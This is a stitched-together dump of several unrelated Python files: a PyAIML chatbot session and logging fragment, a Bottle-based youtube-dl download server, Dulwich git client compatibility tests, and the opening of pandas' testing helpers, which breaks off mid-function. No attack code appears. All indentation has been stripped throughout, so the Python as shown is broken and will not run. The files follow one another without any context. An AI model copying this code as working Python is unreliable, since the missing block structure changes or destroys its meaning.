try: sessionsDir = config["general.sessionsdir"]
except: sessionsDir = "sessions"
# set up the kernel
kernel.verbose(verbose)
kernel.setPredicate("secure", "yes") # secure the global session
kernel.bootstrap(learnFiles="std-startup.xml", commands="bootstrap")
kernel.setPredicate("secure", "no") # and unsecure it.
# Initialize bot predicates
print 'initializing bot predicates'
for k,v in config.items():
if k[:8] != "botinfo.":
continue
kernel.setBotPredicate(k[8:], v)
# Load persistent session data, if necessary
if sessionsPersist:
try:
for session in os.listdir(sessionsDir):
# Session files are named "user@protocol.ses", where
# user@protocol is also the internal name of the session.
root, ext = os.path.splitext(session)
if ext != ".ses":
# This isn't a session file.
continue
# Load the contents of the session file (a single dictionary
# containing all the predicates for this session).
if verbose: print "Loading session:", root
f = file("%s/%s" %(sessionsDir, session), "rb")
d = marshal.load(f)
f.close()
# update the predicate values in the Kernel.
for k,v in d.items():
kernel.setPredicate(k,v,root)
except OSError:
print "WARNING: Error loading session data from", sessionsDir
# Handle local mode: only start the tty frontend
if config['cla.localMode'].lower() in ["yes", "y", "true"]:
#print 'config local mode'
try: _addFrontEnd("tty", "FrontEndTTY")
except:
print "ERROR initializing frontend class frontends.tty.FrontEndTTY"
traceback.print_tb(sys.exc_info()[2])
else:
#print 'Initializing the front-ends'
# Initialize the front-ends. Pythonic black magic ensues...
# First we iterate over all frontend modules.
for fe in frontends.__all__:
# If this frontend isn't activated in the configuration file,
# ignore it.
try: isActive = (config["%s.active" % fe].lower() in ["yes", "y", "true"])
except KeyError:
print "WARNING: no 'active' entry found for module %s in configuration file." % fe
isActive = False
if not isActive:
if config['cla.verboseMode'] == 'yes':
print "Skipping inactive frontend: %s" % fe
continue
# Attempt to extract the name of the front-end class defined in this module.
# If no such class is defined, or if the class is not a subclass of IFrontEnd,
# skip this module.
try:
#print 'evaluating frontends'
cls = eval("frontends.%s.frontEndClass" % fe)
#print 'evaluated frontends'
if not issubclass(eval("frontends.%s.%s" % (fe, cls)), frontends.frontend.IFrontEnd):
continue
except AttributeError:
# no valid front-end class defined in this file.
print "WARNING: could not find valid front-end class in module %s" % fe
continue
# Create an instance of this class in the _frontends dictionary
try: _addFrontEnd(fe, cls)
except:
# raise # uncomment for details on error
print "ERROR initializing frontend class frontends.%s.%s" % (fe,cls)
traceback.print_tb(sys.exc_info()[2])
continue
def speak(text):
speech_engine.say(text)
speech_engine.runAndWait()
def submit(input, session):
#print 'will submit response'
"Submits a statement to the back-end. Returns the response to the statement."
response = kernel.respond(input, session)
#res=str(response)
#print(response)
#print 'kai horas'
#speak('what is happening')
#print 'kai hoyes'
config = configFile.get()
# if logging is enabled, write the input and response to the log.
try:
#print 'log'
if config["general.logging"].lower() in ["yes", "y", "true"]:
#print 'bhithar'
logdir = config["general.logdir"]
if not os.path.isdir(logdir): os.mkdir(logdir)
logfile = file("%s/%s.log" % (logdir, session), "a")
logfile.write(time.strftime("[%m/%d/%Y %H:%M:%S]\n"))
logfile.write("%s: %s\n" % (session, input))
logfile.write("%s: %s\n" % (kernel.getBotPredicate("name"), response))
#print(logfile)
logfile.close()
except KeyError:
pass
# If persistent sessions are enabled, store the session data.
try:
if config["general.sessionspersist"].lower() in ["yes", "y", "true"]:
print 'session'
sessionsdir = config["general.sessionsdir"]
if not os.path.isdir(sessionsdir): os.mkdir(sessionsdir)
sessionfile = file("%s/%s.ses" % (sessionsdir, session), "wb")
marshal.dump(kernel.getSessionData(session), sessionfile)
sessionfile.close()
except KeyError:
pass
#speak('gos')
#print 'seri'
return response
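# Illustrative call only (the session id follows the "user@protocol" naming
# used for the persistent session files above; the values are made up):
#   response = submit("Hello", "alice@tty")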
|
youtube-dl-server.py
|
from __future__ import unicode_literals
import json
import os
import subprocess
from queue import Queue
from bottle import route, run, Bottle, request, static_file
from threading import Thread
import youtube_dl
from pathlib import Path
from collections import ChainMap
app = Bottle()
app_defaults = {
'YDL_FORMAT': 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]',
'YDL_EXTRACT_AUDIO_FORMAT': None,
'YDL_EXTRACT_AUDIO_QUALITY': '192',
'YDL_RECODE_VIDEO_FORMAT': None,
'YDL_OUTPUT_TEMPLATE': '/youtube-dl/%(title)s [%(id)s].%(ext)s',
'YDL_ARCHIVE_FILE': None,
'YDL_SERVER_HOST': '0.0.0.0',
'YDL_SERVER_PORT': 8080,
'YDL_PROXY': None,
}
@app.route('/youtube-dl')
def dl_queue_list():
return static_file('index.html', root='./')
@app.route('/youtube-dl/static/:filename#.*#')
def server_static(filename):
return static_file(filename, root='./static')
@app.route('/youtube-dl/q', method='GET')
def q_size():
return {"success": True, "size": json.dumps(list(dl_q.queue))}
@app.route('/youtube-dl/q', method='POST')
def q_put():
url = request.forms.get("url")
options = {
'format': request.forms.get("format")
}
if not url:
return {"success": False, "error": "/q called without a 'url' query param"}
dl_q.put((url, options))
print("Added url " + url + " to the download queue")
return {"success": True, "url": url, "options": options}
def dl_worker():
while not done:
url, options = dl_q.get()
download(url, options)
dl_q.task_done()
def get_ydl_options(request_options):
request_vars = {
'YDL_EXTRACT_AUDIO_FORMAT': None,
'YDL_RECODE_VIDEO_FORMAT': None,
}
requested_format = request_options.get('format', 'bestvideo')
if requested_format in ['aac', 'flac', 'mp3', 'm4a', 'opus', 'vorbis', 'wav']:
request_vars['YDL_EXTRACT_AUDIO_FORMAT'] = requested_format
elif requested_format == 'bestaudio':
request_vars['YDL_EXTRACT_AUDIO_FORMAT'] = 'best'
elif requested_format in ['mp4', 'flv', 'webm', 'ogg', 'mkv', 'avi']:
request_vars['YDL_RECODE_VIDEO_FORMAT'] = requested_format
ydl_vars = ChainMap(request_vars, os.environ, app_defaults)
postprocessors = []
    if ydl_vars['YDL_EXTRACT_AUDIO_FORMAT']:
postprocessors.append({
'key': 'FFmpegExtractAudio',
'preferredcodec': ydl_vars['YDL_EXTRACT_AUDIO_FORMAT'],
'preferredquality': ydl_vars['YDL_EXTRACT_AUDIO_QUALITY'],
})
    if ydl_vars['YDL_RECODE_VIDEO_FORMAT']:
postprocessors.append({
'key': 'FFmpegVideoConvertor',
'preferedformat': ydl_vars['YDL_RECODE_VIDEO_FORMAT'],
})
ydl_options = {
'format': ydl_vars['YDL_FORMAT'],
'postprocessors': postprocessors,
'outtmpl': ydl_vars['YDL_OUTPUT_TEMPLATE'],
'download_archive': ydl_vars['YDL_ARCHIVE_FILE']
}
if ydl_vars['YDL_PROXY']:
ydl_options['proxy'] = ydl_vars['YDL_PROXY']
return ydl_options
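# Illustrative overrides (any of the YDL_* keys in app_defaults can be supplied
# as environment variables; the proxy address is a placeholder):
#   YDL_FORMAT=bestaudio YDL_PROXY=socks5://127.0.0.1:9050 python youtube-dl-server.py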
def download(url, request_options):
with youtube_dl.YoutubeDL(get_ydl_options(request_options)) as ydl:
ydl.download([url])
dl_q = Queue()
done = False
dl_thread = Thread(target=dl_worker)
dl_thread.start()
print("Started download thread")
app_vars = ChainMap(os.environ, app_defaults)
app.run(host=app_vars['YDL_SERVER_HOST'], port=app_vars['YDL_SERVER_PORT'], debug=True)
done = True
dl_thread.join()
|
test_client.py
|
# test_client.py -- Compatibility tests for git client.
# Copyright (C) 2010 Google, Inc.
#
# Dulwich is dual-licensed under the Apache License, Version 2.0 and the GNU
# General Public License as published by the Free Software Foundation; version 2.0
# or (at your option) any later version. You can redistribute it and/or
# modify it under the terms of either of these two licenses.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# You should have received a copy of the licenses; if not, see
# <http://www.gnu.org/licenses/> for a copy of the GNU General Public License
# and <http://www.apache.org/licenses/LICENSE-2.0> for a copy of the Apache
# License, Version 2.0.
#
"""Compatibilty tests between the Dulwich client and the cgit server."""
import copy
from io import BytesIO
import os
import select
import signal
import stat
import subprocess
import sys
import tarfile
import tempfile
import threading
from urllib.parse import unquote
import http.server
from dulwich import (
client,
file,
index,
protocol,
objects,
repo,
)
from dulwich.tests import (
SkipTest,
expectedFailure,
)
from dulwich.tests.compat.utils import (
CompatTestCase,
check_for_daemon,
import_repo_to_dir,
rmtree_ro,
run_git_or_fail,
_DEFAULT_GIT,
)
if sys.platform == "win32":
import ctypes
class DulwichClientTestBase(object):
"""Tests for client/server compatibility."""
def setUp(self):
self.gitroot = os.path.dirname(
import_repo_to_dir("server_new.export").rstrip(os.sep)
)
self.dest = os.path.join(self.gitroot, "dest")
file.ensure_dir_exists(self.dest)
run_git_or_fail(["init", "--quiet", "--bare"], cwd=self.dest)
def tearDown(self):
rmtree_ro(self.gitroot)
def assertDestEqualsSrc(self):
repo_dir = os.path.join(self.gitroot, "server_new.export")
dest_repo_dir = os.path.join(self.gitroot, "dest")
with repo.Repo(repo_dir) as src:
with repo.Repo(dest_repo_dir) as dest:
self.assertReposEqual(src, dest)
def _client(self):
raise NotImplementedError()
def _build_path(self):
raise NotImplementedError()
def _do_send_pack(self):
c = self._client()
srcpath = os.path.join(self.gitroot, "server_new.export")
with repo.Repo(srcpath) as src:
sendrefs = dict(src.get_refs())
del sendrefs[b"HEAD"]
c.send_pack(
self._build_path("/dest"),
lambda _: sendrefs,
src.generate_pack_data,
)
def test_send_pack(self):
self._do_send_pack()
self.assertDestEqualsSrc()
def test_send_pack_nothing_to_send(self):
self._do_send_pack()
self.assertDestEqualsSrc()
# nothing to send, but shouldn't raise either.
self._do_send_pack()
@staticmethod
def _add_file(repo, tree_id, filename, contents):
tree = repo[tree_id]
blob = objects.Blob()
blob.data = contents.encode("utf-8")
repo.object_store.add_object(blob)
tree.add(filename.encode("utf-8"), stat.S_IFREG | 0o644, blob.id)
repo.object_store.add_object(tree)
return tree.id
def test_send_pack_from_shallow_clone(self):
c = self._client()
server_new_path = os.path.join(self.gitroot, "server_new.export")
run_git_or_fail(["config", "http.uploadpack", "true"], cwd=server_new_path)
run_git_or_fail(["config", "http.receivepack", "true"], cwd=server_new_path)
remote_path = self._build_path("/server_new.export")
with repo.Repo(self.dest) as local:
result = c.fetch(remote_path, local, depth=1)
for r in result.refs.items():
local.refs.set_if_equals(r[0], None, r[1])
tree_id = local[local.head()].tree
for filename, contents in [
("bar", "bar contents"),
("zop", "zop contents"),
]:
tree_id = self._add_file(local, tree_id, filename, contents)
commit_id = local.do_commit(
message=b"add " + filename.encode("utf-8"),
committer=b"Joe Example <joe@example.com>",
tree=tree_id,
)
sendrefs = dict(local.get_refs())
del sendrefs[b"HEAD"]
c.send_pack(remote_path, lambda _: sendrefs, local.generate_pack_data)
with repo.Repo(server_new_path) as remote:
self.assertEqual(remote.head(), commit_id)
def test_send_without_report_status(self):
c = self._client()
c._send_capabilities.remove(b"report-status")
srcpath = os.path.join(self.gitroot, "server_new.export")
with repo.Repo(srcpath) as src:
sendrefs = dict(src.get_refs())
del sendrefs[b"HEAD"]
c.send_pack(
self._build_path("/dest"),
lambda _: sendrefs,
src.generate_pack_data,
)
self.assertDestEqualsSrc()
def make_dummy_commit(self, dest):
b = objects.Blob.from_string(b"hi")
dest.object_store.add_object(b)
t = index.commit_tree(dest.object_store, [(b"hi", b.id, 0o100644)])
c = objects.Commit()
c.author = c.committer = b"Foo Bar <foo@example.com>"
c.author_time = c.commit_time = 0
c.author_timezone = c.commit_timezone = 0
c.message = b"hi"
c.tree = t
dest.object_store.add_object(c)
return c.id
def disable_ff_and_make_dummy_commit(self):
# disable non-fast-forward pushes to the server
dest = repo.Repo(os.path.join(self.gitroot, "dest"))
run_git_or_fail(
["config", "receive.denyNonFastForwards", "true"], cwd=dest.path
)
commit_id = self.make_dummy_commit(dest)
return dest, commit_id
def compute_send(self, src):
sendrefs = dict(src.get_refs())
del sendrefs[b"HEAD"]
return sendrefs, src.generate_pack_data
def test_send_pack_one_error(self):
dest, dummy_commit = self.disable_ff_and_make_dummy_commit()
dest.refs[b"refs/heads/master"] = dummy_commit
repo_dir = os.path.join(self.gitroot, "server_new.export")
with repo.Repo(repo_dir) as src:
sendrefs, gen_pack = self.compute_send(src)
c = self._client()
result = c.send_pack(
self._build_path("/dest"), lambda _: sendrefs, gen_pack
)
self.assertEqual(
{
b"refs/heads/branch": None,
b"refs/heads/master": "non-fast-forward",
},
result.ref_status,
)
def test_send_pack_multiple_errors(self):
dest, dummy = self.disable_ff_and_make_dummy_commit()
# set up for two non-ff errors
branch, master = b"refs/heads/branch", b"refs/heads/master"
dest.refs[branch] = dest.refs[master] = dummy
repo_dir = os.path.join(self.gitroot, "server_new.export")
with repo.Repo(repo_dir) as src:
sendrefs, gen_pack = self.compute_send(src)
c = self._client()
result = c.send_pack(
self._build_path("/dest"), lambda _: sendrefs, gen_pack
)
self.assertEqual(
{branch: "non-fast-forward", master: "non-fast-forward"},
result.ref_status,
)
def test_archive(self):
c = self._client()
f = BytesIO()
c.archive(self._build_path("/server_new.export"), b"HEAD", f.write)
f.seek(0)
tf = tarfile.open(fileobj=f)
self.assertEqual(["baz", "foo"], tf.getnames())
def test_fetch_pack(self):
c = self._client()
with repo.Repo(os.path.join(self.gitroot, "dest")) as dest:
result = c.fetch(self._build_path("/server_new.export"), dest)
for r in result.refs.items():
dest.refs.set_if_equals(r[0], None, r[1])
self.assertDestEqualsSrc()
def test_fetch_pack_depth(self):
c = self._client()
with repo.Repo(os.path.join(self.gitroot, "dest")) as dest:
result = c.fetch(self._build_path("/server_new.export"), dest, depth=1)
for r in result.refs.items():
dest.refs.set_if_equals(r[0], None, r[1])
self.assertEqual(
dest.get_shallow(),
set(
[
b"35e0b59e187dd72a0af294aedffc213eaa4d03ff",
b"514dc6d3fbfe77361bcaef320c4d21b72bc10be9",
]
),
)
def test_repeat(self):
c = self._client()
with repo.Repo(os.path.join(self.gitroot, "dest")) as dest:
result = c.fetch(self._build_path("/server_new.export"), dest)
for r in result.refs.items():
dest.refs.set_if_equals(r[0], None, r[1])
self.assertDestEqualsSrc()
result = c.fetch(self._build_path("/server_new.export"), dest)
for r in result.refs.items():
dest.refs.set_if_equals(r[0], None, r[1])
self.assertDestEqualsSrc()
def test_fetch_empty_pack(self):
c = self._client()
with repo.Repo(os.path.join(self.gitroot, "dest")) as dest:
result = c.fetch(self._build_path("/server_new.export"), dest)
for r in result.refs.items():
dest.refs.set_if_equals(r[0], None, r[1])
self.assertDestEqualsSrc()
def dw(refs):
return list(refs.values())
result = c.fetch(
self._build_path("/server_new.export"),
dest,
determine_wants=dw,
)
for r in result.refs.items():
dest.refs.set_if_equals(r[0], None, r[1])
self.assertDestEqualsSrc()
def test_incremental_fetch_pack(self):
self.test_fetch_pack()
dest, dummy = self.disable_ff_and_make_dummy_commit()
dest.refs[b"refs/heads/master"] = dummy
c = self._client()
repo_dir = os.path.join(self.gitroot, "server_new.export")
with repo.Repo(repo_dir) as dest:
result = c.fetch(self._build_path("/dest"), dest)
for r in result.refs.items():
dest.refs.set_if_equals(r[0], None, r[1])
self.assertDestEqualsSrc()
def test_fetch_pack_no_side_band_64k(self):
c = self._client()
c._fetch_capabilities.remove(b"side-band-64k")
with repo.Repo(os.path.join(self.gitroot, "dest")) as dest:
result = c.fetch(self._build_path("/server_new.export"), dest)
for r in result.refs.items():
dest.refs.set_if_equals(r[0], None, r[1])
self.assertDestEqualsSrc()
def test_fetch_pack_zero_sha(self):
# zero sha1s are already present on the client, and should
# be ignored
c = self._client()
with repo.Repo(os.path.join(self.gitroot, "dest")) as dest:
result = c.fetch(
self._build_path("/server_new.export"),
dest,
lambda refs: [protocol.ZERO_SHA],
)
for r in result.refs.items():
dest.refs.set_if_equals(r[0], None, r[1])
def test_send_remove_branch(self):
with repo.Repo(os.path.join(self.gitroot, "dest")) as dest:
dummy_commit = self.make_dummy_commit(dest)
dest.refs[b"refs/heads/master"] = dummy_commit
dest.refs[b"refs/heads/abranch"] = dummy_commit
sendrefs = dict(dest.refs)
sendrefs[b"refs/heads/abranch"] = b"00" * 20
del sendrefs[b"HEAD"]
def gen_pack(have, want, ofs_delta=False):
return 0, []
c = self._client()
self.assertEqual(dest.refs[b"refs/heads/abranch"], dummy_commit)
c.send_pack(self._build_path("/dest"), lambda _: sendrefs, gen_pack)
self.assertFalse(b"refs/heads/abranch" in dest.refs)
def test_send_new_branch_empty_pack(self):
with repo.Repo(os.path.join(self.gitroot, "dest")) as dest:
dummy_commit = self.make_dummy_commit(dest)
dest.refs[b"refs/heads/master"] = dummy_commit
dest.refs[b"refs/heads/abranch"] = dummy_commit
sendrefs = {b"refs/heads/bbranch": dummy_commit}
def gen_pack(have, want, ofs_delta=False):
return 0, []
c = self._client()
self.assertEqual(dest.refs[b"refs/heads/abranch"], dummy_commit)
c.send_pack(self._build_path("/dest"), lambda _: sendrefs, gen_pack)
self.assertEqual(dummy_commit, dest.refs[b"refs/heads/abranch"])
def test_get_refs(self):
c = self._client()
refs = c.get_refs(self._build_path("/server_new.export"))
repo_dir = os.path.join(self.gitroot, "server_new.export")
with repo.Repo(repo_dir) as dest:
self.assertDictEqual(dest.refs.as_dict(), refs)
class DulwichTCPClientTest(CompatTestCase, DulwichClientTestBase):
def setUp(self):
CompatTestCase.setUp(self)
DulwichClientTestBase.setUp(self)
if check_for_daemon(limit=1):
raise SkipTest(
"git-daemon was already running on port %s" % protocol.TCP_GIT_PORT
)
fd, self.pidfile = tempfile.mkstemp(
prefix="dulwich-test-git-client", suffix=".pid"
)
os.fdopen(fd).close()
args = [
_DEFAULT_GIT,
"daemon",
"--verbose",
"--export-all",
"--pid-file=%s" % self.pidfile,
"--base-path=%s" % self.gitroot,
"--enable=receive-pack",
"--enable=upload-archive",
"--listen=localhost",
"--reuseaddr",
self.gitroot,
]
self.process = subprocess.Popen(
args,
cwd=self.gitroot,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
if not check_for_daemon():
raise SkipTest("git-daemon failed to start")
def tearDown(self):
with open(self.pidfile) as f:
pid = int(f.read().strip())
if sys.platform == "win32":
PROCESS_TERMINATE = 1
handle = ctypes.windll.kernel32.OpenProcess(PROCESS_TERMINATE, False, pid)
ctypes.windll.kernel32.TerminateProcess(handle, -1)
ctypes.windll.kernel32.CloseHandle(handle)
else:
try:
os.kill(pid, signal.SIGKILL)
os.unlink(self.pidfile)
except (OSError, IOError):
pass
self.process.wait()
self.process.stdout.close()
self.process.stderr.close()
DulwichClientTestBase.tearDown(self)
CompatTestCase.tearDown(self)
def _client(self):
return client.TCPGitClient("localhost")
def _build_path(self, path):
return path
if sys.platform == "win32":
@expectedFailure
def test_fetch_pack_no_side_band_64k(self):
DulwichClientTestBase.test_fetch_pack_no_side_band_64k(self)
class TestSSHVendor(object):
@staticmethod
def run_command(
host,
command,
username=None,
port=None,
password=None,
key_filename=None,
):
cmd, path = command.split(" ")
cmd = cmd.split("-", 1)
path = path.replace("'", "")
p = subprocess.Popen(
cmd + [path],
bufsize=0,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
return client.SubprocessWrapper(p)
class DulwichMockSSHClientTest(CompatTestCase, DulwichClientTestBase):
def setUp(self):
CompatTestCase.setUp(self)
DulwichClientTestBase.setUp(self)
self.real_vendor = client.get_ssh_vendor
client.get_ssh_vendor = TestSSHVendor
def tearDown(self):
DulwichClientTestBase.tearDown(self)
CompatTestCase.tearDown(self)
client.get_ssh_vendor = self.real_vendor
def _client(self):
return client.SSHGitClient("localhost")
def _build_path(self, path):
return self.gitroot + path
class DulwichSubprocessClientTest(CompatTestCase, DulwichClientTestBase):
def setUp(self):
CompatTestCase.setUp(self)
DulwichClientTestBase.setUp(self)
def tearDown(self):
DulwichClientTestBase.tearDown(self)
CompatTestCase.tearDown(self)
def _client(self):
return client.SubprocessGitClient()
def _build_path(self, path):
return self.gitroot + path
class GitHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
"""HTTP Request handler that calls out to 'git http-backend'."""
# Make rfile unbuffered -- we need to read one line and then pass
# the rest to a subprocess, so we can't use buffered input.
rbufsize = 0
def do_POST(self):
self.run_backend()
def do_GET(self):
self.run_backend()
def send_head(self):
return self.run_backend()
def log_request(self, code="-", size="-"):
# Let's be quiet, the test suite is noisy enough already
pass
def run_backend(self): # noqa: C901
"""Call out to git http-backend."""
# Based on CGIHTTPServer.CGIHTTPRequestHandler.run_cgi:
# Copyright (c) 2001-2010 Python Software Foundation;
# All Rights Reserved
# Licensed under the Python Software Foundation License.
rest = self.path
# find an explicit query string, if present.
i = rest.rfind("?")
if i >= 0:
rest, query = rest[:i], rest[i + 1 :]
else:
query = ""
env = copy.deepcopy(os.environ)
env["SERVER_SOFTWARE"] = self.version_string()
env["SERVER_NAME"] = self.server.server_name
env["GATEWAY_INTERFACE"] = "CGI/1.1"
env["SERVER_PROTOCOL"] = self.protocol_version
env["SERVER_PORT"] = str(self.server.server_port)
env["GIT_PROJECT_ROOT"] = self.server.root_path
env["GIT_HTTP_EXPORT_ALL"] = "1"
env["REQUEST_METHOD"] = self.command
uqrest = unquote(rest)
env["PATH_INFO"] = uqrest
env["SCRIPT_NAME"] = "/"
if query:
env["QUERY_STRING"] = query
host = self.address_string()
if host != self.client_address[0]:
env["REMOTE_HOST"] = host
env["REMOTE_ADDR"] = self.client_address[0]
authorization = self.headers.get("authorization")
if authorization:
authorization = authorization.split()
if len(authorization) == 2:
import base64
import binascii
env["AUTH_TYPE"] = authorization[0]
if authorization[0].lower() == "basic":
try:
authorization = base64.decodestring(authorization[1])
except binascii.Error:
pass
else:
authorization = authorization.split(":")
if len(authorization) == 2:
env["REMOTE_USER"] = authorization[0]
# XXX REMOTE_IDENT
content_type = self.headers.get("content-type")
if content_type:
env["CONTENT_TYPE"] = content_type
length = self.headers.get("content-length")
if length:
env["CONTENT_LENGTH"] = length
referer = self.headers.get("referer")
if referer:
env["HTTP_REFERER"] = referer
accept = []
for line in self.headers.getallmatchingheaders("accept"):
if line[:1] in "\t\n\r ":
accept.append(line.strip())
else:
accept = accept + line[7:].split(",")
env["HTTP_ACCEPT"] = ",".join(accept)
ua = self.headers.get("user-agent")
if ua:
env["HTTP_USER_AGENT"] = ua
co = self.headers.get("cookie")
if co:
env["HTTP_COOKIE"] = co
# XXX Other HTTP_* headers
# Since we're setting the env in the parent, provide empty
# values to override previously set values
for k in (
"QUERY_STRING",
"REMOTE_HOST",
"CONTENT_LENGTH",
"HTTP_USER_AGENT",
"HTTP_COOKIE",
"HTTP_REFERER",
):
env.setdefault(k, "")
self.wfile.write(b"HTTP/1.1 200 Script output follows\r\n")
self.wfile.write(("Server: %s\r\n" % self.server.server_name).encode("ascii"))
self.wfile.write(("Date: %s\r\n" % self.date_time_string()).encode("ascii"))
decoded_query = query.replace("+", " ")
try:
nbytes = int(length)
except (TypeError, ValueError):
nbytes = 0
if self.command.lower() == "post" and nbytes > 0:
data = self.rfile.read(nbytes)
else:
data = None
env["CONTENT_LENGTH"] = "0"
# throw away additional data [see bug #427345]
while select.select([self.rfile._sock], [], [], 0)[0]:
if not self.rfile._sock.recv(1):
break
args = ["http-backend"]
if "=" not in decoded_query:
args.append(decoded_query)
stdout = run_git_or_fail(args, input=data, env=env, stderr=subprocess.PIPE)
self.wfile.write(stdout)
class HTTPGitServer(http.server.HTTPServer):
allow_reuse_address = True
def __init__(self, server_address, root_path):
http.server.HTTPServer.__init__(self, server_address, GitHTTPRequestHandler)
self.root_path = root_path
self.server_name = "localhost"
def get_url(self):
return "http://%s:%s/" % (self.server_name, self.server_port)
class DulwichHttpClientTest(CompatTestCase, DulwichClientTestBase):
min_git_version = (1, 7, 0, 2)
def setUp(self):
CompatTestCase.setUp(self)
DulwichClientTestBase.setUp(self)
self._httpd = HTTPGitServer(("localhost", 0), self.gitroot)
self.addCleanup(self._httpd.shutdown)
threading.Thread(target=self._httpd.serve_forever).start()
run_git_or_fail(["config", "http.uploadpack", "true"], cwd=self.dest)
run_git_or_fail(["config", "http.receivepack", "true"], cwd=self.dest)
def tearDown(self):
DulwichClientTestBase.tearDown(self)
CompatTestCase.tearDown(self)
self._httpd.shutdown()
self._httpd.socket.close()
def _client(self):
return client.HttpGitClient(self._httpd.get_url())
def _build_path(self, path):
return path
def test_archive(self):
raise SkipTest("exporting archives not supported over http")
|
testing.py
|
from __future__ import division
# pylint: disable-msg=W0402
import random
import re
import string
import sys
import tempfile
import warnings
import inspect
import os
import subprocess
import locale
import unittest
import traceback
from datetime import datetime
from functools import wraps, partial
from contextlib import contextmanager
from distutils.version import LooseVersion
from numpy.random import randn, rand
import numpy as np
from numpy.testing import assert_array_equal
import pandas as pd
from pandas.core.common import is_sequence, array_equivalent, is_list_like, is_number
import pandas.compat as compat
from pandas.compat import(
filter, map, zip, range, unichr, lrange, lmap, lzip, u, callable, Counter,
raise_with_traceback, httplib
)
from pandas.computation import expressions as expr
from pandas import (bdate_range, CategoricalIndex, DatetimeIndex, TimedeltaIndex, PeriodIndex,
Index, MultiIndex, Series, DataFrame, Panel, Panel4D)
from pandas.util.decorators import deprecate
from pandas import _testing
from pandas.io.common import urlopen
N = 30
K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
# set testing_mode
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get('PANDAS_TESTING_MODE','None')
if 'deprecate' in testing_mode:
warnings.simplefilter('always', DeprecationWarning)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get('PANDAS_TESTING_MODE','None')
if 'deprecate' in testing_mode:
warnings.simplefilter('ignore', DeprecationWarning)
set_testing_mode()
class TestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
pd.set_option('chained_assignment', 'raise')
@classmethod
def tearDownClass(cls):
pass
def reset_display_options(self):
# reset the display options
pd.reset_option('^display.', silent=True)
def round_trip_pickle(self, obj, path=None):
if path is None:
path = u('__%s__.pickle' % rands(10))
with ensure_clean(path) as path:
pd.to_pickle(obj, path)
return pd.read_pickle(path)
# https://docs.python.org/3/library/unittest.html#deprecated-aliases
def assertEquals(self, *args, **kwargs):
return deprecate('assertEquals', self.assertEqual)(*args, **kwargs)
def assertNotEquals(self, *args, **kwargs):
return deprecate('assertNotEquals', self.assertNotEqual)(*args, **kwargs)
def assert_(self, *args, **kwargs):
return deprecate('assert_', self.assertTrue)(*args, **kwargs)
def assertAlmostEquals(self, *args, **kwargs):
return deprecate('assertAlmostEquals', self.assertAlmostEqual)(*args, **kwargs)
def assertNotAlmostEquals(self, *args, **kwargs):
return deprecate('assertNotAlmostEquals', self.assertNotAlmostEqual)(*args, **kwargs)
# NOTE: don't pass an NDFrame or index to this function - may not handle it
# well.
assert_almost_equal = _testing.assert_almost_equal
assert_dict_equal = _testing.assert_dict_equal
def randbool(size=(), p=0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits),
dtype=(np.str_, 1))
RANDU_CHARS = np.array(list(u("").join(map(unichr, lrange(1488, 1488 + 26))) +
string.digits), dtype=(np.unicode_, 1))
def rands_array(nchars, size, dtype='O'):
"""Generate an array of byte strings."""
retval = (choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars)).reshape(size))
if dtype is None:
return retval
else:
return retval.astype(dtype)
def randu_array(nchars, size, dtype='O'):
"""Generate an array of unicode strings."""
retval = (choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars)).reshape(size))
if dtype is None:
return retval
else:
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return ''.join(choice(RANDS_CHARS, nchars))
def randu(nchars):
"""
Generate one random unicode string.
See `randu_array` if you want to create an array of random unicode strings.
"""
return ''.join(choice(RANDU_CHARS, nchars))
def choice(x, size=10):
"""sample with replacement; uniform over the input"""
try:
return np.random.choice(x, size=size)
except AttributeError:
return np.random.randint(len(x), size=size).choose(x)
def close(fignum=None):
from matplotlib.pyplot import get_fignums, close as _close
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
def _skip_if_32bit():
import nose
import struct
if struct.calcsize("P") * 8 < 64:
raise nose.SkipTest("skipping for 32 bit")
def mplskip(cls):
"""Skip a TestCase instance if matplotlib isn't installed"""
@classmethod
def setUpClass(cls):
try:
import matplotlib as mpl
mpl.use("Agg", warn=False)
except ImportError:
import nose
raise nose.SkipTest("matplotlib not installed")
cls.setUpClass = setUpClass
return cls
def _skip_if_no_scipy():
try:
import scipy.stats
except ImportError:
import nose
raise nose.SkipTest("no scipy.stats module")
try:
import scipy.interpolate
except ImportError:
import nose
raise nose.SkipTest('scipy.interpolate missing')
def _skip_if_no_pytz():
try:
import pytz
except ImportError:
import nose
raise nose.SkipTest("pytz not installed")
def _skip_if_no_dateutil():
try:
import dateutil
except ImportError:
import nose
raise nose.SkipTest("dateutil not installed")
def _skip_if_no_cday():
from pandas.core.datetools import cday
if cday is None:
import nose
raise nose.SkipTest("CustomBusinessDay not available.")
#------------------------------------------------------------------------------
# locale utilities
def check_output(*popenargs, **kwargs): # shamelessly taken from Python 2.7 source
r"""Run command with arguments and return its output as a byte string.
If the exit code was non-zero it raises a CalledProcessError. The
CalledProcessError object will have the return code in the returncode
attribute and output in the output attribute.
The arguments are the same as for the Popen constructor. Example:
>>> check_output(["ls", "-l", "/dev/null"])
'crw-rw-rw- 1 root root 1, 3 Oct 18 2007 /dev/null\n'
The stdout argument is not allowed as it is used internally.
To capture standard error in the result, use stderr=STDOUT.
>>> check_output(["/bin/sh", "-c",
... "ls -l non_existent_file ; exit 0"],
... stderr=STDOUT)
'ls: non_existent_file: No such file or directory\n'
"""
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
process = subprocess.Popen(stdout=subprocess.PIPE,stderr=subprocess.PIPE,
